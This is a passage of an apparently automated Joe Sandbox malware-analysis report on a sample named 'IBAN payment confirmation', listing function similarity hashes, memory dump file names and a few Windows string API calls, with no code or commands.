                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7c1b3bbb7fb5d360c352e29dce0ca82793dba8b39a20caf6091836a7e5acd446
                                                                                                                              • Instruction ID: 5ff8dc76d646c522b35349404ae71f3a07db7e5a5a41cf42f501ef55767b32d6
                                                                                                                              • Opcode Fuzzy Hash: 7c1b3bbb7fb5d360c352e29dce0ca82793dba8b39a20caf6091836a7e5acd446
                                                                                                                              • Instruction Fuzzy Hash: DD913470E04229CBEF28CF98C8547ADBBB1FF44305F15816AD852BB291C7789996DF44
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 06a588dc36723823e64c1d76eb6b79df0e0f5c7b74692a20a357622d355e40c3
                                                                                                                              • Instruction ID: bb31d40f455f6cff8f0b7d4569728449f81f985eb729d97d8cba9c35205a948c
                                                                                                                              • Opcode Fuzzy Hash: 06a588dc36723823e64c1d76eb6b79df0e0f5c7b74692a20a357622d355e40c3
                                                                                                                              • Instruction Fuzzy Hash: A6814471E04228CBDF24CFA8C844BADBBB1FF44305F25816AD456BB281C7789996DF44
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 72aa8ec3dd0942b5b71c471d9b9626f4b4465e3dfbf4f8c787812f56ef585442
                                                                                                                              • Instruction ID: e59bb743c0d69fedc8ec9c1b53f92d0ee49f9853fc7f4c6d73f4ee5c7875ed1f
                                                                                                                              • Opcode Fuzzy Hash: 72aa8ec3dd0942b5b71c471d9b9626f4b4465e3dfbf4f8c787812f56ef585442
                                                                                                                              • Instruction Fuzzy Hash: FE816671E04228DBDF24CFA8C8447ADBBB0FF44305F15816AD856BB281C7786996DF44
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1d7d6eeb6ae866c31b6fd6fb1bb683d5497ea3b6253a7880f6caf84b5ad72384
                                                                                                                              • Instruction ID: 9556348457f1f5f1301c48e47fc8538a45dff02eab8277f34011f15b85b09a92
                                                                                                                              • Opcode Fuzzy Hash: 1d7d6eeb6ae866c31b6fd6fb1bb683d5497ea3b6253a7880f6caf84b5ad72384
                                                                                                                              • Instruction Fuzzy Hash: 43711271E00228DBDF28CF98C854BADBBB1FF48305F15806AD816BB281C7789996DF54
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 55af2c983f537d9a3a53cfac4a449f3e0c8fe7d310f5448a54a9ff87f60f3244
                                                                                                                              • Instruction ID: ef61438920200bd82941886013112b5956151ce3a95704f571d29bdd470ffe0d
                                                                                                                              • Opcode Fuzzy Hash: 55af2c983f537d9a3a53cfac4a449f3e0c8fe7d310f5448a54a9ff87f60f3244
                                                                                                                              • Instruction Fuzzy Hash: FF713571E00228DBDF28CF98C854BADBBB1FF44305F15806AD856BB291C7789996DF44
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 720b16b0405195766e324cd34a7adf45238a3bda3f5e9f89198b3f7d2eee93b7
                                                                                                                              • Instruction ID: 0528ad5c4640a45b82c18dce6d1929194436f5f2edf35a138e23b2c729619556
                                                                                                                              • Opcode Fuzzy Hash: 720b16b0405195766e324cd34a7adf45238a3bda3f5e9f89198b3f7d2eee93b7
                                                                                                                              • Instruction Fuzzy Hash: AD714671E00228DBDF28CF98C854BADBBB1FF44305F15806AD816BB291C778AA56DF44
                                                                                                                              APIs
                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
                                                                                                                              • lstrcmpiA.KERNEL32(00405CF5,00000000), ref: 00405AE3
                                                                                                                              • CharNextA.USER32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF4
                                                                                                                              • lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 190613189-0
                                                                                                                              • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                                              • Instruction ID: dad0a046b028959ebe33103b56e1cab2fddac0818810981e259aca52f0e6fc56
                                                                                                                              • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                                              • Instruction Fuzzy Hash: 59F06232608558BFC712DFA5DD40D9FBBA8DF06260B2540B6F801F7251D674FE019BA9